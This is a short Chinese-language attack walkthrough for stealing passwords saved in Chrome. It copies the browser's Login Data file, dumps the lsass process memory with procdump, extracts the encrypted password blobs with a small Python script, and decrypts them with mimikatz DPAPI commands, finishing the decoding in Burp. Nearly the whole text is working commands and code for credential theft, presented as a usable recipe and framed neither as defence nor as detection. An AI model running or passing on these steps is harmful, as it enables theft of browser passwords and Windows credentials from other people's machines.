利用Masterkey离线导出Chrome浏览器中保存的密码
快速说明
- 需要浏览器Login Data文件 和 lsass进程的内存文件
步骤一 获得目标Login Data
copy %LocalAppData%\Google\Chrome\User Data\Default\Login Data Login_Data # 这里保存的文件名改变了,多了个"_"
步骤二 获得lsass进程的内存文件
tasklist /fi "imagename eq lsass.exe"
procdump -accepteula -ma 640 lsass.dmp 管理员权限
步骤三 把Login Data的密码提取出来(会生成test.txt文件)
from os import getenv
import sqlite3
import binascii
conn = sqlite3.connect("Login_Data")
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
print (binascii.b2a_hex(result[2]))
f = open('test.txt', 'wb')
f.write(result[2])
f.close()
步骤四 在本地使用mimikatz提取Master Key,解密Login Data获得明文
使用mimikatz加载dmp文件: # 注:mimikatz从lsass进程提取出Master Key后,会自动将Master Key加入系统缓存
sekurlsa::minidump lsass.dmp
sekurlsa::dpapi
使用masterkey解密
dpapi::blob /in:test.txt
把获得的ascii的密码放到burp里解开即是密码
